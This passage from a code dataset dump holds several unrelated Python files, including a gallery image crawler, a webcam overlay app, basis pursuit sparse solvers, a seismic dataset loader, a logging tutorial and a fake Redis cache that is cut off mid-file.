colored(item[\"name\"], \"green\"),\n colored(item[\"status\"], \"yellow\"),\n ))\n os.system(\"notify-send -u critical {} done\".format(item[\"name\"]))\n input(colored(\n \"Press ENTER to continue...\",\n \"green\",\n attrs=[\"reverse\", \"blink\"],\n ))\n\n print(\"\")\n print(\"+---------+\")\n print(\"| Results |\")\n print(\"+---------+\")\n for item in data[\"list\"]:\n if \"status\" in item:\n print(\"{}: {}\".format(\n colored(item[\"name\"], \"green\"),\n colored(item[\"status\"], \"yellow\"),\n ))\n else:\n print(\"{}: {}\".format(\n colored(item[\"name\"], \"green\"),\n colored(\"skipped\", \"yellow\"),\n ))\n\n\nif __name__ == \"__main__\":\n with open(\"send.json\") as f:\n parse(json.load(f))\n","repo_name":"petrposvic/scripts","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36395478105","text":"\n# Python program to \n# demonstrate merging \n# of two files \n \ndata = data2 = \"\" \n \n# Reading data from file1 \nwith open('final_enc','rb') as fp: \n data = fp.read() \n \n\nprint(\"len(data): \",len(data))\n\nd1=data[0:256]\nd2=data[256:]\n \nprint(\"len(rsa_encrypted_session_key_RECV): \",len(d1))\nprint(\"len(session_key_encrypted_merged_enc_hash_and_message_RECV): \",len(d2))\n\nwith open ('rsa_encrypted_session_key_RECV', 'wb') as fp: \n fp.write(d1)\n\nwith open ('session_key_encrypted_merged_enc_hash_and_message_RECV', 'wb') as fp: \n fp.write(d2) \n","repo_name":"JustKshitijD/Encryption-and-Authentication-using-OpenSSL","sub_path":"COAI/break_final_enc_for_decryption.py","file_name":"break_final_enc_for_decryption.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9481723963","text":"\"\"\"\nDeuce Valere - Client - Splitter\n\"\"\"\nimport itertools\nimport logging\n\nfrom deucevalere.common.validation_instance import *\n\n\nclass MetaChunkError(Exception):\n pass\n\n\nclass StorageChunkError(Exception):\n pass\n\n\nclass ValereSplitter(object):\n\n @validate(deuce_client=ClientRule,\n vault=VaultInstanceRule)\n def __init__(self, deuce_client, vault):\n self.deuceclient = deuce_client\n self.vault = vault\n self.log = logging.getLogger(__name__)\n\n @validate(limit=LimitRule)\n def store_chunker(self, limit):\n \"\"\"\n The store_chunker is called when the listing of metadata blocks\n yielded an empty list. The list of storage blocks would then be\n chunked, by extracting the metadata block_id(sha1) from each of\n the storage blocks.(Since each storageblock is of the form\n sha1_uuid5)\n\n :param limit: number of elements per chunk\n :return: a list of lists containing projectid, vaultid\n start marker and end marker\n \"\"\"\n marker = None\n\n def storage_list(marker, limit):\n\n try:\n storage_ids = self.deuceclient.GetBlockStorageList(self.vault,\n marker=marker,\n limit=limit)\n except RuntimeError as ex:\n msg = 'Storage Chunking for Projectid: {0},' \\\n 'Vault: {1} failed!' \\\n 'Error : {2}'.format(self.vault.project_id,\n self.vault.vault_id,\n str(ex))\n self.log.warn(msg)\n raise StorageChunkError(msg)\n\n if not len(storage_ids):\n return (None, None, None)\n\n st_marker = self.vault.storageblocks.marker\n\n if not st_marker:\n return (storage_ids[0].split('_')[0],\n None,\n None)\n\n return (storage_ids[0].split('_')[0],\n st_marker.split('_')[0],\n st_marker)\n\n while True:\n\n start, end, st_marker = storage_list(marker, limit)\n\n if (start, end, st_marker) == (None, None, None):\n break\n\n gen_expr = [self.vault.project_id,\n self.vault.vault_id,\n start,\n end]\n marker = st_marker\n\n if start != end:\n yield gen_expr\n\n if not end: # pragma: no cover\n break\n\n @validate(limit=LimitRule)\n def meta_chunker(self, limit):\n \"\"\"\n The chunker splits the listing of metadata blocks from a vault\n that belongs to a specific projectid into manageable chunks.\n This allows instantiating the Manager object with different\n start and end markers, therefore allowing them to be validated.\n :param limit: number of elements per chunk\n :return: a list of lists containing projectid, vaultid\n start marker and an end marker.\n \"\"\"\n marker = None\n storage = None\n\n def metadata_list(marker, limit):\n\n try:\n\n block_ids = self.deuceclient.GetBlockList(self.vault,\n marker=marker,\n limit=limit)\n\n except RuntimeError as ex:\n msg = 'Storage Chunking for Projectid: {0},' \\\n 'Vault: {1} failed!' \\\n 'Error : {2}'.format(self.vault.project_id,\n self.vault.vault_id,\n str(ex))\n self.log.warn(msg)\n raise MetaChunkError(msg)\n\n if not len(block_ids):\n return (None, None)\n\n marker = self.vault.storageblocks.marker\n\n return (block_ids[0],\n marker)\n while True:\n\n start, end = metadata_list(marker, limit)\n\n if (start, end) == (None, None):\n storage = True\n break\n\n gen_expr = [self.vault.project_id,\n self.vault.vault_id,\n start,\n end]\n marker = end\n\n yield gen_expr\n\n if not end: # pragma: no cover\n break\n\n if storage:\n yield from self.store_chunker(limit)\n","repo_name":"rackerlabs/deuce-valere","sub_path":"deucevalere/splitter/meta_splitter.py","file_name":"meta_splitter.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"4038818312","text":"from dataclasses import dataclass, field\nfrom dataclasses_json import dataclass_json, config, LetterCase\nfrom PIL.Image import Image\nfrom Task import Task\nfrom base64converter import base_64_to_PIL_Image, PIL_Image_to_base_64\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass Exam:\n '''\n Class for storing an exam.\n\n The attributes of an exam are:\n - Image of the exam.\n - Filename \n - List of tasks (see task.py)\n - Modified image for user feedback\n '''\n\n image: Image = field(\n compare=False,\n # required for json converting\n metadata=config(\n encoder=PIL_Image_to_base_64,\n decoder=base_64_to_PIL_Image\n )\n )\n filename: str\n tasks: list[Task] = field(compare=True, init=True)\n image_modified: Image = field(\n default=None,\n compare=False,\n init=False,\n # required for json converting\n metadata=config(\n encoder=PIL_Image_to_base_64,\n decoder=base_64_to_PIL_Image\n )\n )\n\n def __post_init__(self):\n self.image_modified = self.image\n","repo_name":"phfn/AI-Exam-Correction","sub_path":"src/backend/Exam.py","file_name":"Exam.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8639458057","text":"# logging has 5 different hierarchical levels of logs that a given logger may be configured to.\n#\n# Lets see what the python docs has to say about each level:\n#\n# DEBUG: Detailed information, for diagnosing problems. Value=10.\n# INFO: Confirm things are working as expected. Value=20.\n# WARNING: Something unexpected happened,\n# or indicative of some problem. But the software is still working as expected. Value=30.\n# ERROR: More serious problem, the software is not able to perform some function. Value=40\n# CRITICAL: A serious error, the program itself may be unable to continue running. Value=50\n# Now, coming back to the previous question of what would have happened had you not setup logging.basicConfig\n# (level=logging.INFO) in the previous example.\n#\n# The answer is: the log would not have been printed because, the default logger is the root and its\n# default basicConfig level is WARNING. That means, only messages from logging.warning() and higher levels will get\n# logged.\n# So, the message of logging.info() would not be printed. And that is why the basic config was set as INFO initially\n# (in logging.basicConfig(level=logging.INFO)).\n# Had I set the level as logging.ERROR instead, only message from logging.error and logging.critical will be logged.\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\n\ndef hypotenuse(a, b):\n \"\"\"Compute the hypotenuse\"\"\"\n return (a**2 + b**2)**0.5\n\nkwargs = {'a':3, 'b':4, 'c':hypotenuse(3, 4)}\n\nlogging.debug(\"a = {a}, b = {b}\".format(**kwargs))\nlogging.info(\"Hypotenuse of {a}, {b} is {c}\".format(**kwargs))\nlogging.warning(\"a={a} and b={b} are equal\".format(**kwargs))\nlogging.error(\"a={a} and b={b} cannot be negative\".format(**kwargs))\nlogging.critical(\"Hypotenuse of {a}, {b} is {c}\".format(**kwargs))\n\n#> WARNING:root:a=3 and b=3 are equal\n#> ERROR:root:a=-1 and b=4 cannot be negative\n#> CRITICAL:root:Hypotenuse of a, b is 5.0\n\n","repo_name":"syurskyi/Python_Topics","sub_path":"090_logging/examples/Python Logging – Simplest Guide with Full Code and Examples/002_3. The 5 levels of logging.py","file_name":"002_3. The 5 levels of logging.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33237151705","text":"import galleryCrawler as gC\n\nclass SantaEvent(gC.rssImageExtractor):\n website = \"camster.com\"\n\n def start_requests(self):\n try:\n filename = gC.sys.argv[1]\n except:\n # filename2 = \"upperbound.opml\"\n filename = \"galleryLinks.opml\"\n # filename = \"StaticLinks.opml\"\n # filename = \"Test.opml\"\n t = open(filename, \"r+\")\n urls = t.readlines()\n t.close()\n gC.random.shuffle(urls)\n for url in urls:\n sqaureP = gC.re.search(\"@\\[(.*)\\]\", url)\n if sqaureP != None:\n lb, ub = [int(x) for x in gC.re.split(\"[-,]\",sqaureP[1])]\n NewUrls = [url.replace(sqaureP[0],str(ui)) for ui in range(lb,ub)]\n [urls.append(NewUrl) for NewUrl in NewUrls]\n continue\n if self.website in url:\n yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n def parseFnc(self,response):\n print(self.website)\n url = response.url.strip(\"/#\")\n imgUrls = response.css(\"img[src*=thumb]::attr(src)\").extract()\n imgUrls = [x.replace(\"thumbs/\",\"\") for x in imgUrls]\n fileNames = []\n prefix = url.split(\"/\")[-1]\n fileNames = [prefix +\" \"+ str(i)+\".jpg\" for i in response.css(\"img[src*=thumb]::attr(data-photo-id)\").extract()]\n self.downloadGalleryGeneric(response, imgUrls, fileNames, galCode=\"@\")\n temp = response.css(\"a[href*=\\?pg\\=]::text\").extract()\n text = temp[0] if len(temp) > 0 else \"\"\n\n print(imgUrls)\n if \"Next\" in text:\n print(\"traversingNext\")\n url = response.css(\"a[href*=\\?pg\\=]::attr(href)\").extract()[0]\n url = gC.urllib.request.urljoin(response.url, url)\n yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n\n\nif __name__ == \"__main__\":\n print(SantaEvent.website)\n try:\n process = gC.CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n process.crawl(SantaEvent)\n process.start()\n except Exception as e:\n with open(\"log.txt\", \"a+\") as inF:\n inF.write(str(e) + \"\\n\")\n","repo_name":"BeautyScraper/GalleryDownloader","sub_path":"camster.py","file_name":"camster.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4271775000","text":"#!/usr/bin/python3\n\nimport gi\ngi.require_version('Gst', '1.0')\n\n#For threading support\nfrom gi.repository import GObject\n\nGObject.threads_init()\n\n#For the as of this moment not working video...\nfrom gi.repository import Gst, Gtk\n# Needed for window.get_xid(), xvimagesink.set_window_handle(), respectively:\nfrom gi.repository import GdkX11, GstVideo\n\n#for keypresses\nfrom gi.repository import Gdk\n\nGst.init(None)\n\nfrom gi.repository import Gtk\n\nclass StatusIcon(Gtk.StatusIcon):\n def __init__(self, rootwin):\n Gtk.StatusIcon.__init__(self)\n self.rootwin = rootwin\n self.set_from_stock(Gtk.STOCK_HOME) \n self.connect(\"popup-menu\", self.right_click_event)\n\n def right_click_event(self, icon, button, time):\n self.menu = Gtk.Menu()\n \n about = Gtk.MenuItem()\n about.set_label(\"About\")\n about.connect(\"activate\", self.show_about_dialog)\n\n settings = Gtk.MenuItem()\n settings.set_label(\"Settings\")\n settings.connect(\"activate\", self.rootwin.properties_wrap)\n\n quit = Gtk.MenuItem()\n quit.set_label(\"Quit\") \n quit.connect(\"activate\", self.rootwin.quit)\n \n self.menu.append(settings)\n self.menu.append(about)\n self.menu.append(quit)\n \n self.menu.show_all()\n \n def pos(menu, icon):\n return (Gtk.StatusIcon.position_menu(menu, icon))\n \n self.menu.popup(None, None, pos, self, button, time)\n\n def show_about_dialog(self, widget):\n about_dialog = Gtk.AboutDialog()\n\n about_dialog.set_destroy_with_parent(True)\n about_dialog.set_name(\"CamCastic-Desktop\")\n about_dialog.set_version(\"0.1\")\n about_dialog.set_authors([\"Andrew King\",\"Mateo Salta\"])\n\n about_dialog.run()\n about_dialog.destroy()\n\nclass Player(object):\n def __init__(self):\n self.win = Gtk.Window()\n self.status_icon = StatusIcon(self)\n self.resolution = {\n 'width' : Gdk.get_default_root_window().get_width(),\n 'height' : Gdk.get_default_root_window().get_height()\n }\n self.height = int(self.resolution['height']/3)\n self.width = int(self.height/3*4)\n self.win.connect('destroy', self.quit)\n self.win.set_default_size(self.width, self.height)\n self.win.set_decorated(False)\n self.win.set_keep_above(True)\n self.win.set_property('skip-taskbar-hint', True)\n self.win.set_double_buffered(False)\n\n self.pipeline = Gst.parse_launch (\"v4l2src ! videoconvert ! xvimagesink\")\n\n self.bus = self.pipeline.get_bus()\n self.bus.add_signal_watch()\n self.bus.connect('message::eos', self.on_eos)\n self.bus.connect('message::error', self.on_error)\n\n self.bus.enable_sync_message_emission()\n self.bus.connect('sync-message::element', self.on_sync_message)\n\n self.win.connect(\"key-press-event\", self.on_keypress)\n self.on_keypress_dict = {\n Gdk.KEY_Escape : Gtk.main_quit,\n Gdk.KEY_F1 : self.pipeline.set_state,\n Gdk.KEY_F2 : self.pipeline.set_state,\n }\n self.state_args = {\n Gdk.KEY_Escape : Gtk.main_quit,\n Gdk.KEY_F1 : Gst.State.PLAYING,\n Gdk.KEY_F2 : Gst.State.NULL\n }\n self.win.move(self.resolution['width'] - self.width, self.resolution['height'] - self.height)\n\n def on_keypress(self, widget, event):\n '''\n A case switch statement to eliminate the\n five checks kludginess\n '''\n print('In keypress')\n if event.keyval == Gdk.KEY_F5: self.properties(widget, event)\n else: \n try:\n self.on_keypress_dict[event.keyval](self.state_args[event.keyval])\n except KeyError:\n pass\n\n def properties_wrap(self, arg):\n self.properties(None, None)\n\n def properties(self, widget, event):\n try:\n self.prop_win.show()\n except:\n self.prop_win = Gtk.Window(Gtk.WindowType.TOPLEVEL)\n self.prop_win.set_position(Gtk.WindowPosition.CENTER)\n self.prop_win.set_decorated(False)\n self.prop_win.set_title(\"Properties\")\n self.prop_win.set_size_request(320, 120)\n self.prop_win.set_resizable(False)\n self.prop_win.set_keep_above(True)\n self.prop_win.set_property('skip-taskbar-hint', True)\n self.prop_win.connect(\"destroy\", self.closeproperties)\n vbox = Gtk.VBox(spacing=4)\n\n hbox = Gtk.HBox(spacing=4)\n check = Gtk.CheckButton(\"Pin\")\n check.set_active(True)\n check.set_size_request(100, 35)\n check.connect(\"clicked\", self.pinning)\n hbox.pack_start(check, True, True, 10)\n scale = Gtk.HScale()\n scale.set_range(0, 100)\n scale.set_value(100)\n scale.set_size_request(320, 35)\n scale.connect(\"value-changed\", self.opac_slider)\n hbox.pack_start(scale, True, True, 10)\n self.entry = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n\n self.entry.set_text(str(self.width))\n self.entry2.set_text(str(self.height))\n\n\n hbox2 = Gtk.HBox(spacing=4)\n hbox2.pack_start(self.entry, True, True, 10)\n hbox2.pack_start(self.entry2, True, True, 10)\n hbox3 = Gtk.HBox(spacing=4)\n ok = Gtk.Button(\"OK\")\n ok.connect(\"clicked\", self.change_size)\n hbox3.pack_start(ok, True, True, 10)\n exit = Gtk.Button(\"Exit\")\n exit.connect(\"clicked\", self.closeproperties)\n hbox3.pack_start(exit, True, True, 10)\n vbox.pack_start(hbox, True, True, 10)\n vbox.pack_start(hbox2, True, True, 10)\n vbox.pack_start(hbox3, True, True, 10)\n self.prop_win.add(vbox)\n self.prop_win.show_all()\n\n def pinning(self, checkbox):\n if checkbox.get_active():\n self.set_keep_above(True)\n else:\n self.set_keep_above(False)\n\n def opac_slider(self, w):\n self.win.set_opacity(w.get_value()/100.0)\n self.pipeline.set_state(Gst.State.PLAYING)\n \n def change_size(self, w):\n print('in change size')\n self.width = int(self.entry.get_text())\n self.height = int(self.entry2.get_text())\n self.win.resize(self.width,self.height)\n self.win.move(self.resolution['width'] - self.width, self.resolution['height'] - self.height)\n self.win.show_all()\n\n def closeproperties(self, w):\n self.prop_win.hide()\n\n def run(self):\n self.win.show_all()\n # You need to get the XID after window.show_all(). You shouldn't get it\n # in the on_sync_message() handler because threading issues will cause\n # segfaults there.\n self.xid = self.win.get_property('window').get_xid()\n\n print('in get_xid')\n self.pipeline.set_state(Gst.State.READY)\n Gtk.main()\n\n def quit(self, window):\n self.pipeline.set_state(Gst.State.NULL)\n Gtk.main_quit()\n\n def on_sync_message(self, bus, msg):\n if msg.get_structure().get_name() == 'prepare-window-handle':\n print('prepare-window-handle')\n msg.src.set_property('force-aspect-ratio', True)\n msg.src.set_window_handle(self.xid)\n print('prepped')\n\n def on_eos(self, bus, msg):\n print('on_eos(): seeking to start of video')\n self.pipeline.seek_simple(\n Gst.Format.TIME, \n Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,\n 0\n )\n\n def on_error(self, bus, msg):\n print('on_error():', msg.parse_error())\n\n\np = Player()\np.run()\n\n\n","repo_name":"mateosalta/CamCastic-Desktop","sub_path":"CamCastic/CamCastic.py","file_name":"CamCastic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"18508355213","text":"from tkinter import*\r\n\r\njanela = Tk()\r\n\r\njanela.title(\"Janela Principal\")\r\njanela[\"bg\"]=\"gray\"\r\n\r\n\r\nlb1 = Label(janela, text=\"Email\")\r\nlb2 = Label(janela, text=\"Senha\")\r\n\r\ntxt1 = Entry(janela, width=50)\r\ntxt2 = Entry(janela, width=50)\r\n\r\nbtn = Button(janela, text = \"Login\")\r\nbtn1 = Button(janela, text = \"Recuperar senha\")\r\n\r\nlb1.grid(row=0, column=0)\r\nlb2.grid(row=1, column=0)\r\ntxt1.grid(row=0, column=1)\r\ntxt2.grid(row=1, column=1)\r\n\r\nbtn.grid(row=2, column=0)\r\nbtn1.grid(row=2, column=1)\r\n\r\n\r\n#posicionamento e tamanho da janela\r\n#L x A + ME + MT\r\njanela.geometry(\"600x750+0+0\")\r\n\r\n\r\njanela.mainloop()\r\n","repo_name":"GermanaQueiroz/PROJETO-IN1076-","sub_path":"AberturaQuestionário.py","file_name":"AberturaQuestionário.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16187834782","text":"r\"\"\"\nBasis Pursuit (BP) solvers tackle the original :math:`P_0` problem\n:eq:`p0_approx` by posing L1-relaxation on the norm of unknown :math:`\\vec{x}`.\n\n\n.. autosummary::\n :toctree: toctree/relaxation/\n\n basis_pursuit_linprog\n basis_pursuit_admm\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.linalg import solve_triangular\nfrom scipy.optimize import linprog\n\nfrom sparse.relaxation.utils import soft_shrinkage, negligible_improvement\n\n\ndef basis_pursuit_linprog(A, b, max_iters=100):\n r\"\"\"\n Basis Pursuit solver for the :math:`P_1` problem\n\n .. math::\n \\min_x \\|x\\|_1 \\quad \\text{s.t.} \\ \\boldsymbol{A} \\vec{x} = \\vec{b}\n :label: bp\n\n via linear programming.\n\n `scipy.optimize.linprog` is used to solve the linear programming task.\n\n Parameters\n ----------\n A : (N, M) np.ndarray\n The input weight matrix :math:`\\boldsymbol{A}`.\n b : (N,) np.ndarray\n The right side of the equation :eq:`bp`.\n tol : float\n The accuracy tolerance of linprog.\n\n Returns\n -------\n x : (M,) np.ndarray\n :math:`\\vec{x}`, the solution to :eq:`bp`.\n\n \"\"\"\n # We convert the problem by splitting x into the\n # positive and negative entries x=u-v, u,v>=0.\n #\n # The solution is returned in the vector x.\n\n # Set the options to be used by the linprog solver\n opt = {\"maxiter\": max_iters, \"disp\": False}\n\n A = np.asarray(A, dtype=np.float32)\n x_dim = A.shape[1]\n A_extended = np.c_[A, -A]\n coefficients_x = np.ones(A_extended.shape[1], dtype=np.float32)\n\n res = linprog(c=coefficients_x, A_eq=A_extended, b_eq=b, options=opt)\n\n x_extended = res.x\n x = x_extended[: x_dim] - x_extended[x_dim:]\n\n return x\n\n\ndef basis_pursuit_admm(A, b, lambd, tol=1e-4, max_iters=100,\n cholesky=False):\n r\"\"\"\n Basis Pursuit solver for the :math:`Q_1^\\epsilon` problem\n\n .. math::\n \\min_x \\frac{1}{2} \\left|\\left| \\boldsymbol{A}\\vec{x} - \\vec{b}\n \\right|\\right|_2^2 + \\lambda \\|x\\|_1\n\n via the alternating direction method of multipliers (ADMM).\n\n Parameters\n ----------\n A : (N, M) np.ndarray\n The input weight matrix :math:`\\boldsymbol{A}`.\n b : (N,) np.ndarray\n The right side of the equation :math:`\\boldsymbol{A}\\vec{x} = \\vec{b}`.\n lambd : float\n The soft-shrinkage threshold :math:`\\lambda`, controls the sparsity of\n :math:`\\vec{x}`.\n tol : float\n The accuracy tolerance of ADMM.\n max_iters : int\n Run for at most `max_iters` iterations.\n cholesky : bool\n Whether to use the Cholesky factorization (slow, but stable) or the\n inverse (fast, but might be unstable) of a matrix.\n\n Returns\n -------\n v : (M,) np.ndarray\n The solution vector :math:`\\vec{x}`.\n \"\"\"\n\n # Compute the vector of inner products between the atoms and the signal\n A_dot_b = A.T.dot(b)\n\n # In the x-update step of the ADMM we use the Cholesky factorization for\n # solving efficiently a given linear system Ax=b. The idea of this\n # factorization is to decompose a symmetric positive-definite matrix A\n # by A = L*L^T = L*U, where L is a lower triangular matrix and U is\n # its transpose. Given L and U, we can solve Ax = b by first solving\n # Ly = b for y by forward substitution, and then solving Ux = y\n # for x by back substitution.\n # To conclude, given A and b, where A is symmetric and positive-definite,\n # we first compute L using Matlab's command L = chol( A, 'lower' );\n # and get U by setting U = L'; Then, we obtain x via x = U \\ (L \\ b);\n # Note that the matrix A is fixed along the iterations of the ADMM\n # (and so as L and U). Therefore, in order to reduce computations,\n # we compute its decomposition once.\n\n # Compute the Cholesky factorization of M = CA'*CA + I for fast\n # computation of the x-update. Use Matlab's chol function and produce a\n # lower triangular matrix L, satisfying the equation M = L*L'\n M = A.T.dot(A) + np.eye(A.shape[1], dtype=np.float32)\n if cholesky:\n L = np.linalg.cholesky(M)\n else:\n M_inv = np.linalg.inv(M)\n\n # Initialize v\n v = np.zeros(A.shape[1], dtype=np.float32)\n\n # Initialize u, the dual variable of ADMM\n u = np.zeros(A.shape[1], dtype=np.float32)\n\n # Initialize the previous estimate of v, used for convergence test\n v_prev = v.copy()\n\n # main loop\n for i in range(max_iters):\n # x-update via Cholesky factorization. Solve the linear system\n # (CA'*CA + I)x = (CAtb + v - u)\n b_eff = A_dot_b + v - u\n if cholesky:\n # safe, slow\n y = solve_triangular(L, b_eff, trans=0, lower=True)\n x = solve_triangular(L, y, trans=2, lower=True)\n else:\n # unsafe, fast\n x = M_inv.dot(b_eff)\n\n # v-update via soft thresholding\n v = soft_shrinkage(x + u, lambd=lambd)\n\n # u-update according to the ADMM formula\n u = u + x - v\n\n # Check if converged\n if negligible_improvement(v, v_prev, tol=tol):\n break\n\n # Save the previous estimate in v_prev\n v_prev = v.copy()\n\n return v\n","repo_name":"dizcza/sparse-representation","sub_path":"sparse/relaxation/basis_pursuit.py","file_name":"basis_pursuit.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"69942595684","text":"import seisbench\r\nimport seisbench.util\r\nfrom seisbench.data.base import BenchmarkDataset, WaveformDataWriter\r\n\r\nfrom pathlib import Path\r\nimport h5py\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass CWBSN(BenchmarkDataset):\r\n def __init__(self, loading_method=\"full\", **kwargs):\r\n\r\n self.loading_method = loading_method\r\n\r\n # ======================= #\r\n # TODO: citation, license #\r\n # ======================= #\r\n citation = ()\r\n license = \"\"\r\n super().__init__(citation=citation, license=license, **kwargs)\r\n\r\n def _download_dataset(self, writer: WaveformDataWriter, basepath=None, **kwargs):\r\n path = self.path\r\n\r\n # CWBSN: containing 2012~2021\r\n years = [str(y) for y in range(2012, 2022)]\r\n\r\n if basepath is None:\r\n raise ValueError(\"No cached version of CWBSN found. \")\r\n\r\n basepath = Path(basepath)\r\n\r\n # Data format\r\n writer.data_format = {\r\n \"dimension_order\": \"CW\",\r\n \"component_order\": \"ZNE\",\r\n \"sampling_rate\": 100,\r\n \"measurement\": \"velocity/acceleration\",\r\n \"unit\": \"cmps/cmps2\",\r\n }\r\n\r\n # 檢查 10 年資料有無缺漏,並下載缺漏的年份資料\r\n missing_metadata, missing_waveform = self.check(basepath, years)\r\n\r\n # ============================================= #\r\n # TODO: 之後上傳檔案到網路上後,新增下載方式的 code\r\n # ============================================= #\r\n\r\n # Loading dataset\r\n if self.loading_method == \"simple\":\r\n print(\"Simple loading...\")\r\n writer = self.simple_load(writer, basepath, years)\r\n elif self.loading_method == \"single\":\r\n print(\"Single loading...\")\r\n writer = self.single_load(writer, basepath, years)\r\n elif self.loading_method == \"event\":\r\n writer = self.event_load(writer, basepath, years)\r\n elif self.loading_method == \"full\":\r\n print(\"Fully loading...\")\r\n writer = self.full_load(writer, basepath, years)\r\n\r\n @staticmethod\r\n def set_split(year):\r\n if year == \"2021\" or year == \"2020\":\r\n return \"test\"\r\n elif year == \"2019\":\r\n return \"dev\"\r\n else:\r\n return \"train\"\r\n\r\n @staticmethod\r\n def check(basepath, years):\r\n metadata = []\r\n waveform = []\r\n\r\n for y in years:\r\n path = \"metadata_\" + str(y) + \".csv\"\r\n if not (basepath / path).is_file():\r\n metadata.append(y)\r\n\r\n path = \"chunks_\" + str(y) + \".hdf5\"\r\n if not (basepath / path).is_file():\r\n waveform.append(y)\r\n\r\n return metadata, waveform\r\n\r\n def full_load(self, writer, basepath, years):\r\n # full load: 全部都 load 進 dataset\r\n\r\n total_trace = 0\r\n for y in years:\r\n print(\"years: \", y)\r\n # Loading metadata (ex. 2020),之後一次 load 所有年份的資料進來\r\n meta_path = \"metadata_\" + y + \".csv\"\r\n metadata = pd.read_csv(basepath / meta_path)\r\n\r\n metadata[\"split\"] = self.set_split(y)\r\n\r\n # Adding traces (ex. 2020),之後一次 load 所有年份的資料進來\r\n hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n with h5py.File(basepath / hdf5_path) as f:\r\n gdata = f[\"data\"]\r\n for _, row in metadata.iterrows():\r\n row = row.to_dict()\r\n\r\n # Adding trace only when waveform is available\r\n waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n writer.add_trace(row, waveforms)\r\n total_trace += 1\r\n\r\n # Total number of traces\r\n writer.set_total(total_trace)\r\n\r\n return writer\r\n\r\n def simple_load(self, writer, basepath, years):\r\n # simple load: 把 trace_completeness=1 的都 load 進來\r\n\r\n total_trace = 0\r\n for y in years:\r\n print(\"years: \", y)\r\n # Loading metadata (ex. 2020),之後一次 load 所有年份的資料進來\r\n meta_path = \"metadata_\" + y + \".csv\"\r\n metadata = pd.read_csv(basepath / meta_path)\r\n\r\n metadata[\"split\"] = self.set_split(y)\r\n\r\n # Adding traces (ex. 2020),之後一次 load 所有年份的資料進來\r\n hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n with h5py.File(basepath / hdf5_path) as f:\r\n gdata = f[\"data\"]\r\n for _, row in metadata.iterrows():\r\n row = row.to_dict()\r\n\r\n # Adding trace only when waveform is available\r\n if row[\"trace_completeness\"] == 1:\r\n waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n writer.add_trace(row, waveforms)\r\n total_trace += 1\r\n\r\n # Total number of traces\r\n writer.set_total(total_trace)\r\n\r\n return writer\r\n\r\n def single_load(self, writer, basepath, years):\r\n # single load: load 只包含一個事件的 traces\r\n\r\n total_trace = 0\r\n for y in years:\r\n print(\"years: \", y)\r\n # Loading metadata (ex. 2020),之後一次 load 所有年份的資料進來\r\n meta_path = \"metadata_\" + y + \".csv\"\r\n metadata = pd.read_csv(basepath / meta_path)\r\n\r\n metadata[\"split\"] = self.set_split(y)\r\n\r\n # Adding traces (ex. 2020),之後一次 load 所有年份的資料進來\r\n hdf5_path = \"chunks_\" + y + \".hdf5\"\r\n with h5py.File(basepath / hdf5_path) as f:\r\n gdata = f[\"data\"]\r\n for _, row in metadata.iterrows():\r\n row = row.to_dict()\r\n\r\n # Adding trace only when waveform is available\r\n if (\r\n row[\"trace_completeness\"] == 1\r\n and row[\"trace_number_of_event\"] == 1\r\n ):\r\n waveforms = gdata[row[\"trace_name\"]][()]\r\n\r\n writer.add_trace(row, waveforms)\r\n total_trace += 1\r\n\r\n # Total number of traces\r\n writer.set_total(total_trace)\r\n\r\n return writer\r\n","repo_name":"hgvf/Picking","sub_path":"seisbench/seisbench/data/cwbsn.py","file_name":"cwbsn.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31364992320","text":"\"\"\"\nA fake cache that emulates just enough of the Redis interface to make unit\ntesting work.\n\"\"\"\n# pylint: disable=C0111,E1129\nfrom threading import RLock\nfrom time import time\n\n\nclass FakeCache(object):\n \"\"\"\n A fake cache that emulates just enough of the Redis interface to make unit\n testing work.\n \"\"\"\n\n def __init__(self):\n super(FakeCache, self).__init__()\n self.data = {}\n self.expires = {}\n self.lock = RLock()\n return\n\n def get(self, key):\n with self.lock:\n expires = self.expires.get(key)\n if expires is not None and time() > expires:\n del self.expires[key]\n del self.data[key]\n return None\n\n return self.data.get(key)\n\n def set(self, key, value, ex=None):\n with self.lock:\n self.data[key] = str(value)\n if ex is None:\n if key in self.expires:\n del self.expires[key]\n else:\n self.expires[key] = time() + ex\n return\n\n def incrbyfloat(self, key, amount=1.0):\n with self.lock:\n value = self.get(key)\n if value is None:\n value = amount\n 